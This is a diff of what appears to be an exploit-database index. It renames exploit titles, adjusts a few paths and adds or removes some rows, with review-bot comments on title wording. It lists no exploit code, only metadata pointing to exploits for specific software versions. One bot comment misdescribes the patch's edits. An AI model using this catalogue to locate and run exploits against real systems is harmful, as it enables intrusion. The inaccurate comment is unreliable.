@@ -9342,8 +9341,8 @@ id,file,description,date,author,type,platform,port 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, 42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows, 42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows, -42936,exploits/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, -42937,exploits/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, +42936,exploits/linux/local/42936.md,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, +42937,exploits/linux/local/42937.md,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, 42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx, 42951,exploits/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,local,windows, 42960,exploits/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,local,win_x86-64, 
@@ -9365,6 +9364,8 @@ id,file,description,date,author,type,platform,port 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, +43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86, +43201,exploits/macos/local/43201.rb,"macOS High Sierra - Root Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
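Review bot: The added row for 43192 has a stray space inside the quotes, 'NtQuerySystemInformation ', which breaks exact-match searches on the function name; remove it. The added row for 43201, "macOS High Sierra - Root Privilege Escalation (Metasploit)", names the release but gives no version number and omits "Local", although other rows in this patch are being changed to read "Local Privilege Escalation"; bring the title in line before merging.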
@@ -9448,7 +9449,7 @@ id,file,description,date,author,type,platform,port 135,exploits/windows/remote/135.c,"Microsoft Windows Messenger Service (French) - Remote (MS03-043)",2003-12-16,MrNice,remote,windows,135 136,exploits/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,remote,windows,80 139,exploits/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,remote,linux,406 -143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,remote,linux, +143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack Overflow",2004-01-14,Li0n7,remote,linux, 149,exploits/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,remote,windows,21 151,exploits/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",remote,windows, 155,exploits/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,remote,windows,3128 
@@ -9772,13 +9773,13 @@ id,file,description,date,author,type,platform,port 1380,exploits/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,remote,windows,143 1381,exploits/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,remote,windows,21 1391,exploits/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",remote,windows, -1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,remote,windows,80 +1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)",2006-01-07,FistFuXXer,remote,windows,80 1413,exploits/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)",2006-01-12,ZwelL,remote,windows, 1414,exploits/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)",2006-01-12,kokanin,remote,windows,5060 1417,exploits/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - 'FTP' Remote System Access",2006-01-14,kokanin,remote,windows,22003 1420,exploits/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,remote,windows, 1421,exploits/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",remote,windows,13701 -1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",remote,windows, +1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC)",2006-01-25,"Critical Security",remote,windows, 1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21 1456,exploits/linux/remote/1456.c,"SHOUTcast 1.9.4 - 
File Request 'Leaked' Format String",2006-01-28,crash-x,remote,linux,8000 1458,exploits/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,remote,windows, @@ -11028,7 +11029,7 @@ id,file,description,date,author,type,platform,port 15866,exploits/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,remote,windows, 15868,exploits/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",remote,windows, 15869,exploits/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,remote,windows, -15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,remote,windows, +15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Buffer Overflow",2011-01-01,rgod,remote,windows, 18245,exploits/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",remote,multiple, 15991,exploits/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",remote,windows, 15957,exploits/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",remote,windows, 
@@ -11717,7 +11718,7 @@ id,file,description,date,author,type,platform,port 17649,exploits/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,remote,windows, 17650,exploits/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,remote,windows, 17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows, -17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, +17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, 17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware, 17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows, 17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows, 
@@ -11728,7 +11729,7 @@ id,file,description,date,author,type,platform,port 17700,exploits/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,remote,windows, 17719,exploits/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,remote,windows, 17721,exploits/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",remote,windows, -17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,remote,windows, +17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit)",2011-08-31,Metasploit,remote,windows, 17810,exploits/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",remote,windows, 17819,exploits/windows/remote/17819.py,"KnFTP Server - Remote Buffer Overflow",2011-09-12,blake,remote,windows, 17827,exploits/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - 'Coreservice.exe' Remote Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,remote,windows, 
@@ -11763,7 +11764,7 @@ id,file,description,date,author,type,platform,port 18102,exploits/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)",2011-11-09,Node,remote,windows, 18123,exploits/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)",2011-11-17,Metasploit,remote,windows, 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows, -18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)",2011-11-20,Metasploit,remote,windows, +18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack Buffer Overflow (Metasploit)",2011-11-20,Metasploit,remote,windows, 18138,exploits/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",remote,windows, 18145,exploits/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,remote,linux, 18171,exploits/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,remote,multiple, 
@@ -11974,6 +11975,7 @@ id,file,description,date,author,type,platform,port 19407,exploits/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow",2012-06-27,"S2 Crew",remote,windows, 19361,exploits/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,remote,windows, 19363,exploits/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",remote,multiple, +19364,exploits/netware/remote/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,remote,netware, 19365,exploits/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",remote,netware, 19369,exploits/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion (Metasploit)",2012-06-25,Metasploit,remote,windows, 19383,exploits/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 - Log Service Directory Traversal",1999-02-22,eEYe,remote,multiple, 
@@ -13302,6 +13304,7 @@ id,file,description,date,author,type,platform,port 23149,exploits/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",remote,windows, 23151,exploits/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",remote,linux, 23152,exploits/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,remote,windows, +23154,exploits/linux/remote/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",remote,linux, 23155,exploits/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)",2012-12-05,Metasploit,remote,windows, 23156,exploits/unix/remote/23156.rb,"(SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,remote,unix, 23157,exploits/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",remote,windows, 
@@ -13405,9 +13408,9 @@ id,file,description,date,author,type,platform,port 23472,exploits/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow (Metasploit)",2012-12-18,Metasploit,remote,windows, 23489,exploits/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 - DLL Authentication Bypass",2003-12-29,Aphex,remote,windows, 23490,exploits/windows/remote/23490.txt,"Microsoft IIS 5.0 - Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",remote,windows, -23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,remote,windows, -23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,remote,windows, -23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",remote,windows, +23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1)",2003-12-29,fiNis,remote,windows, +23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (2)",2003-12-29,D4rkGr3y,remote,windows, +23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",remote,windows, 23695,exploits/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,remote,windows, 23500,exploits/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,remote,windows, 23502,exploits/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",remote,windows, 
@@ -13635,7 +13638,7 @@ id,file,description,date,author,type,platform,port 24350,exploits/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,remote,windows, 24353,exploits/unix/remote/24353.sql,"Oracle 9i - Multiple Vulnerabilities",2004-08-04,"Marco Ivaldi",remote,unix, 24354,exploits/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",remote,windows, -24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,remote,linux, +24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (2)",2004-08-09,jsk,remote,linux, 24363,exploits/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",remote,windows, 24376,exploits/multiple/remote/24376.txt,"Opera Web Browser 7.5 - Resource Detection",2004-07-17,"GreyMagic Software",remote,multiple, 24387,exploits/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",remote,multiple, 
@@ -13811,6 +13814,7 @@ id,file,description,date,author,type,platform,port 25066,exploits/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",remote,multiple, 25072,exploits/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data - Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",remote,multiple, 25079,exploits/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",remote,multiple, +25080,exploits/linux/remote/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",remote,linux, 25092,exploits/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",remote,windows, 25094,exploits/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Remote Buffer Overflow",2005-02-08,ATmaCA,remote,windows, 25095,exploits/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,remote,windows, 
@@ -13988,7 +13992,6 @@ id,file,description,date,author,type,platform,port 26493,exploits/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, 26494,exploits/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, 26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows, -26497,exploits/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,remote,windows, 26529,exploits/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method (Metasploit)",2013-07-01,Metasploit,remote,multiple, 26531,exploits/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,remote,multiple, 26536,exploits/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,remote,linux, 
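Review bot: The 26497 row (RealNetworks RealOne Player/RealPlayer '.RM') is deleted from between 26495 and 26529 with no replacement in this hunk, while the other "Stack Based" titles in the patch are edited in place. If the entry is being reclassified out of remote, its path exploits/windows/remote/26497.c changes too, so confirm the same commit re-adds the row under the new type and moves the file; otherwise the id silently drops out of the index.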
@@ -14322,7 +14325,7 @@ id,file,description,date,author,type,platform,port 29932,exploits/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",remote,linux, 29945,exploits/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",remote,hardware, 29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows, -29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,remote,windows, +29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Buffer Overflow",2007-05-07,MC,remote,windows, 30373,exploits/windows/remote/30373.py,"Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting",2013-12-17,"David Um",remote,windows, 30008,exploits/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,remote,java, 30009,exploits/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,remote,windows,12221 
@@ -14384,7 +14387,7 @@ id,file,description,date,author,type,platform,port 30507,exploits/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, 30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, 30521,exploits/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",remote,multiple, -30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",remote,multiple, +30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Buffer Overflow",2007-08-23,"Luigi Auriemma",remote,multiple, 30532,exploits/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,remote,windows, 30535,exploits/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",remote,linux, 30536,exploits/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",remote,linux, 
@@ -14397,7 +14400,7 @@ id,file,description,date,author,type,platform,port 30882,exploits/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",remote,hardware, 30883,exploits/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",remote,windows, 30562,exploits/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,anonymous,remote,windows, -30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,remote,windows, +30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow",2007-09-04,miyy3t,remote,windows, 30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",remote,windows, 30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",remote,windows, 32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,remote,php, 
@@ -14500,7 +14503,7 @@ id,file,description,date,author,type,platform,port 31253,exploits/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Arbitrary Code Execution",2014-01-29,Mekanismen,remote,jsp,80 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 -31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",remote,linux, +31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",remote,linux, 31260,exploits/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",remote,windows,53 31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80 31279,exploits/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",remote,multiple, 
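Review bot: In the 31462 row, removing "Based" mechanically leaves "Multiple Heap Remote Buffer Overflow Vulnerabilities", with "Remote" stranded between "Heap" and "Buffer". The 30523 and 24361 rows in this patch use the order "Remote Heap Buffer Overflow" / "Remote Heap Buffer Overrun"; suggest "Multiple Remote Heap Buffer Overflow Vulnerabilities" to match.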
@@ -14621,7 +14624,7 @@ id,file,description,date,author,type,platform,port 32210,exploits/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,remote,windows,20111 32223,exploits/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",remote,multiple, 32224,exploits/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",remote,multiple, -32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",remote,linux, +32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Buffer Overflow",2005-01-29,"Brian Hirt",remote,linux, 32228,exploits/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",remote,linux, 32286,exploits/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",remote,linux, 32289,exploits/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",remote,linux, 
@@ -14719,7 +14722,7 @@ id,file,description,date,author,type,platform,port 32879,exploits/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",remote,windows, 32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",remote,unix,443 32998,exploits/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)",2014-04-24,"Ayman Sagy",remote,multiple, -32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,remote,windows, +32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Overflow",2014-04-24,An7i,remote,windows, 32919,exploits/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",remote,hardware, 32920,exploits/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,DSecRG,remote,multiple, 32921,exploits/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,remote,multiple, 
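Review bot: The 32997 title becomes "Remote Stack Overflow", which reads as stack exhaustion rather than a buffer overflow on the stack, because the original wording had no "Buffer" left once "Based" is dropped. If the entry describes a stack buffer overflow, write "Remote Stack Buffer Overflow" as the other renamed rows do; if it really is stack exhaustion, the old title was wrong too and should be corrected separately.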
@@ -14821,7 +14824,7 @@ id,file,description,date,author,type,platform,port 33645,exploits/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,remote,windows, 33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple, 33311,exploits/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",remote,linux, -33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,remote,linux, +33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Buffer Overflow",2009-10-27,regenrecht,remote,linux, 33315,exploits/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,remote,linux, 33316,exploits/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,remote,multiple, 33594,exploits/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code 